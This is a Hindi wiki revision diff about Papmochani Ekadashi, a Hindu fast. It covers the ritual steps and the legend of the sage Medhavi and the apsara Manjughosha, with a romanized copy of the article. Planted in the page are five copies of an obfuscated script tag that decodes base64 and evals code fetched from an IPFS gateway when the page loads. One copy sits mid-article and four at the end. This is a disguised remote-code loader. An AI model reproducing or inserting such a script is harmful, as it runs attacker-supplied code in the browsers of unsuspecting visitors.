Difference between revisions of "पापमोचनी एकादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 +
{{सूचना बक्सा त्योहार
 +
|चित्र=God-vishnu.jpg
 +
|चित्र का नाम= भगवान विष्णु
 +
|अन्य नाम =
 +
|अनुयायी = [[हिंदू]]
 +
|उद्देश्य = इस दिन व्रत करने से समस्त पापों का नाश होता है और सुख-समृद्धि प्राप्त होती है।
 +
|प्रारम्भ =
 +
|तिथि= [[चैत्र]] [[कृष्ण पक्ष]] [[एकादशी]]
 +
|उत्सव =एकादशी तिथि को जागरण करने से कई गुणा पुण्य मिलता है अत: रात्रि में भी निराहार रहकर [[भजन कीर्तन]] करते हुए जागरण करें।
 +
|अनुष्ठान =
 +
|धार्मिक मान्यता =
 +
|प्रसिद्धि =
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=पापमोचनी एकादशी का अर्थ है 'पाप को नष्ट करने वाली एकादशी'। इस दिन निंदित कर्म तथा मिथ्या भाषण नहीं करना चाहिए।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''पापमोचनी एकादशी''' [[पुराण|पुराणों]] के अनुसार [[चैत्र]] [[कृष्ण पक्ष]] की [[एकादशी]] को कहा जाता है। पापमोचनी एकादशी का अर्थ है 'पाप को नष्ट करने वाली एकादशी'।
 
==व्रत और विधि==
 
==व्रत और विधि==
यह एकादशी पापमोचनी एकादशी कहलाती है। अर्थात पाप को नष्ट करने वाली एकादशी। [[पुराण|पुराणों]] के अनुसार [[चैत्र]] [[कृष्ण पक्ष]] की एकादशी पाप मोचिनी है। [[एकादशी]] के दिन सूर्योदय काल में स्नान करके व्रत का संकल्प करें। इस दिन भगवान [[विष्णु]] को अर्ध्य दान देकर षोडशोतपचार पूजा करनी चाहिए। तत्पश्चात धूप, [[दीपक|दीप]], [[चंदन]] आदि से नीराजन करना चाहिए। इस दिन निंदित कर्म तथा मिथ्या भाषण नहीं करना चाहिए। एकादशी के दिन भिक्षुक, बन्धु-बान्धव तथा ब्राह्मणों को भोजन दान देना फलदायी होता है। इस व्रत के करने से समस्त पापों का नाश होता है और सुख-समृद्धि प्राप्त होती है। एकादशी तिथि को जागरण करने से कई गुणा पुण्य मिलता है अत: रात्रि में भी निराहार रहकर [[भजन कीर्तन]] करते हुए जागरण करें। जैसा कि इसके नाम से स्पष्ट है इस व्रत को करने से ब्रह्महत्या, स्वर्णचोरी, मद्यपान, अहिंसा, अगम्यागमन, भ्रूणघात आदि अनेकानेक घोर पापों के दोषों से मुक्ति मिल जाती है।  
+
[[एकादशी]] के दिन सूर्योदय काल में स्नान करके व्रत का संकल्प करें। इस दिन भगवान [[विष्णु]] को अर्ध्य दान देकर षोडशोतपचार पूजा करनी चाहिए। तत्पश्चात धूप, [[दीपक|दीप]], [[चंदन]] आदि से नीराजन करना चाहिए। इस दिन निंदित कर्म तथा मिथ्या भाषण नहीं करना चाहिए। एकादशी के दिन भिक्षुक, बन्धु-बान्धव तथा ब्राह्मणों को भोजन दान देना फलदायी होता है। इस व्रत के करने से समस्त पापों का नाश होता है और सुख-समृद्धि प्राप्त होती है। एकादशी तिथि को जागरण करने से कई गुणा पुण्य मिलता है अत: रात्रि में भी निराहार रहकर [[भजन कीर्तन]] करते हुए जागरण करें। जैसा कि इसके नाम से स्पष्ट है इस व्रत को करने से ब्रह्महत्या, स्वर्णचोरी, मद्यपान, अहिंसा, अगम्यागमन, भ्रूणघात आदि अनेकानेक घोर पापों के दोषों से मुक्ति मिल जाती है।  
==कथा==
+
==एकादशी व्रत कथा==
प्राचीन काल में [[चैत्ररथवन|चैत्ररथ]] नामक अति रमणीक वन था।इस वन में [[च्यवन]] ॠषि के पुत्र मेधावी नामक नामक ॠषि तपस्या करते थे। इसी वन में देवराज [[इंद्र]] गंधर्व कन्याओं, अप्सराओं तथा देवताओं सहित स्वच्छन्द विहार करते थे। ॠषि शिव भक्त तथा अप्सराएं शिवद्रोही कामदेव की अनुचरी थी। एक समय की बात है कामदेव ने मेधावी मुनि की तपस्या को भंग करने के लिए मंजुघोषा नामक अप्सरा को भेजा। उसने अपने नृत्य-गान और हाव-भाव से ॠषि का ध्यान भंग किया। अप्सरा के हाव-भाव और नृत्य गान से ॠषि उस पर मोहित हो गए। दोनों ने अनेक वर्ष साथ-साथ गुजारे। एक दिन जब मंजुघोषा ने जाने के लिए आज्ञा माँगी तो ॠषि को आत्मज्ञान हुआ। उन्होंने समय की गणना की तो 57 वर्ष व्यतीत हो चुके थे। ॠषि को अपनी तपस्या भंग होने का भान हुआ। उन्होंने अपने को रसातल में पहुँचाने का एकमात्र कारण मंजुघोषा को समझकर, क्रोधित होकर उसे पिशाचनी होने का शाप दिया। शाप सुनकर मंजुघोषा काँपने लगी और ॠषि के चरणों में गिर पड़ी। काँपते हुए उसने मुक्ति का उपाय पूछा। बहुत अनुनय-विनय करने पर ॠषि का हृदय पसीज गया। उन्होंने कहा-'यदि तुम चैत्र कृष्ण पापमोचनी एकादशी का विधिपूर्वक व्रत करो तो इसके करने से तुम्हारे पाप और शाप समाप्त हो जाएंगे और तुम पुन: अपने पूर्व रूप को प्राप्त करोगी।' मंजुघोषा को मुक्ति का विधान बताकर मेधावी ॠषि अपने पिता महर्षि च्यवन के पास पहुँचे। शाप की बात सुनकर च्यवन ॠषि ने कहा-'पुत्र यह तुमने अच्छा नहीं किया। शाप देकर स्वयं भी पाप कमाया है। अत: तुम भी पापमोचनी एकादशी का व्रत करो। इस प्रकार पापमोचनी एकादशी का व्रत करके मंजुघोषा ने शाप से तथा ॠषि मेधावी ने पाप से मुक्ति पाई।
+
प्राचीन काल में [[चैत्ररथवन|चैत्ररथ]] नामक अति रमणीक वन था।इस वन में [[च्यवन]] ऋषि के पुत्र मेधावी नामक नामक ऋषि तपस्या करते थे। इसी वन में देवराज [[इंद्र]] गंधर्व कन्याओं, [[अप्सरा|अप्सराओं]] तथा [[देवता|देवताओं]] सहित स्वच्छन्द विहार करते थे। ऋषि [[शिव]] भक्त तथा अप्सराएं शिवद्रोही [[कामदेव]] की अनुचरी थी। एक समय की बात है कामदेव ने मेधावी मुनि की तपस्या को भंग करने के लिए मंजुघोषा नामक अप्सरा को भेजा। उसने अपने नृत्य-गान और हाव-भाव से ऋषि का ध्यान भंग किया। अप्सरा के हाव-भाव और नृत्य गान से ऋषि उस पर मोहित हो गए। दोनों ने अनेक वर्ष साथ-साथ गुजारे। एक दिन जब मंजुघोषा ने जाने के लिए आज्ञा माँगी तो ऋषि को आत्मज्ञान हुआ। उन्होंने समय की गणना की तो 57 वर्ष व्यतीत हो चुके थे। ऋषि को अपनी तपस्या भंग होने का भान हुआ। उन्होंने अपने को रसातल में पहुँचाने का एकमात्र कारण मंजुघोषा को समझकर, क्रोधित होकर उसे पिशाचनी होने का शाप दिया। शाप सुनकर मंजुघोषा काँपने लगी और ऋषि के चरणों में गिर पड़ी। काँपते हुए उसने मुक्ति का उपाय पूछा। बहुत अनुनय-विनय करने पर ऋषि का हृदय पसीज गया। उन्होंने कहा-'यदि तुम [[चैत्र]] [[कृष्ण पक्ष|कृष्ण]] 'पापमोचनी एकादशी' का विधिपूर्वक व्रत करो तो इसके करने से तुम्हारे पाप और शाप समाप्त हो जाएंगे और तुम पुन: अपने पूर्व रूप को प्राप्त करोगी।' मंजुघोषा को मुक्ति का विधान बताकर मेधावी ऋषि अपने पिता महर्षि च्यवन के पास पहुँचे। शाप की बात सुनकर च्यवन ऋषि ने कहा-'पुत्र यह तुमने अच्छा नहीं किया। शाप देकर स्वयं भी पाप कमाया है। अत: तुम भी पापमोचनी एकादशी का व्रत करो। इस प्रकार पापमोचनी एकादशी का व्रत करके मंजुघोषा ने शाप से तथा ऋषि मेधावी ने पाप से मुक्ति पाई।
  
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 +
==टीका-टिप्पणी और संदर्भ==
 +
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
[http://cafehindu.com/festivals/papmochani_ekadashi_vrat_katha_vidhi.html पापमोचनी एकादशी व्रत और कथा]
+
*[http://cafehindu.com/festivals/papmochani_ekadashi_vrat_katha_vidhi.html पापमोचनी एकादशी व्रत और कथा]
 
+
*[http://hariomgroup.net/hariombooks/paath/Hindi/PaapamochaniEkadashi.pdf पापमोचनी एकादशी]
[http://hariomgroup.net/hariombooks/paath/Hindi/PaapamochaniEkadashi.pdf पापमोचनी एकादशी]
+
==संबंधित लेख==
[[Category:संस्कृति कोश]] [[Category:पर्व और त्योहार]]
+
{{पर्व और त्योहार}}{{व्रत और उत्सव}}
[[Category:व्रत और उत्सव]]
+
[[Category:पर्व और त्योहार]]
{{पर्व और त्योहार}}
+
[[Category:व्रत और उत्सव]][[Category:हिन्दू धर्म कोश]] [[Category:संस्कृति कोश]]
{{व्रत और उत्सव}}
 
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 14:21, 7 March 2014

papamochani ekadashi
anuyayi hiandoo
uddeshy is din vrat karane se samast papoan ka nash hota hai aur sukh-samriddhi prapt hoti hai.
tithi chaitr krishna paksh ekadashi
utsav ekadashi tithi ko jagaran karane se kee guna puny milata hai at: ratri mean bhi nirahar rahakar bhajan kirtan karate hue jagaran karean.
any janakari papamochani ekadashi ka arth hai 'pap ko nasht karane vali ekadashi'. is din niandit karm tatha mithya bhashan nahian karana chahie.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

papamochani ekadashi puranoan ke anusar chaitr krishna paksh ki ekadashi ko kaha jata hai. papamochani ekadashi ka arth hai 'pap ko nasht karane vali ekadashi'.

vrat aur vidhi

ekadashi ke din sooryoday kal mean snan karake vrat ka sankalp karean. is din bhagavan vishnu ko ardhy dan dekar shodashotapachar pooja karani chahie. tatpashchat dhoop, dip, chandan adi se nirajan karana chahie. is din niandit karm tatha mithya bhashan nahian karana chahie. ekadashi ke din bhikshuk, bandhu-bandhav tatha brahmanoan ko bhojan dan dena phaladayi hota hai. is vrat ke karane se samast papoan ka nash hota hai aur sukh-samriddhi prapt hoti hai. ekadashi tithi ko jagaran karane se kee guna puny milata hai at: ratri mean bhi nirahar rahakar bhajan kirtan karate hue jagaran karean. jaisa ki isake nam se spasht hai is vrat ko karane se brahmahatya, svarnachori, madyapan, ahiansa, agamyagaman, bhroonaghat adi anekanek ghor papoan ke doshoan se mukti mil jati hai.

ekadashi vrat katha

prachin kal mean chaitrarath namak ati ramanik van tha.is van mean chyavan rrishi ke putr medhavi namak namak rrishi tapasya karate the. isi van mean devaraj iandr gandharv kanyaoan, apsaraoan tatha devataoan sahit svachchhand vihar karate the. rrishi shiv bhakt tatha apsaraean shivadrohi kamadev ki anuchari thi. ek samay ki bat hai kamadev ne medhavi muni ki tapasya ko bhang karane ke lie manjughosha namak apsara ko bheja. usane apane nrity-gan aur hav-bhav se rrishi ka dhyan bhang kiya. apsara ke hav-bhav aur nrity gan se rrishi us par mohit ho ge. donoan ne anek varsh sath-sath gujare. ek din jab manjughosha ne jane ke lie ajna maangi to rrishi ko atmajnan hua. unhoanne samay ki ganana ki to 57 varsh vyatit ho chuke the. rrishi ko apani tapasya bhang hone ka bhan hua. unhoanne apane ko rasatal mean pahuanchane ka ekamatr karan manjughosha ko samajhakar, krodhit hokar use pishachani hone ka shap diya. shap sunakar manjughosha kaanpane lagi aur rrishi ke charanoan mean gir p di. kaanpate hue usane mukti ka upay poochha. bahut anunay-vinay karane par rrishi ka hriday pasij gaya. unhoanne kaha-'yadi tum chaitr krishna 'papamochani ekadashi' ka vidhipoorvak vrat karo to isake karane se tumhare pap aur shap samapt ho jaeange aur tum pun: apane poorv roop ko prapt karogi.' manjughosha ko mukti ka vidhan batakar medhavi rrishi apane pita maharshi chyavan ke pas pahuanche. shap ki bat sunakar chyavan rrishi ne kaha-'putr yah tumane achchha nahian kiya. shap dekar svayan bhi pap kamaya hai. at: tum bhi papamochani ekadashi ka vrat karo. is prakar papamochani ekadashi ka vrat karake manjughosha ne shap se tatha rrishi medhavi ne pap se mukti paee.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika-tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>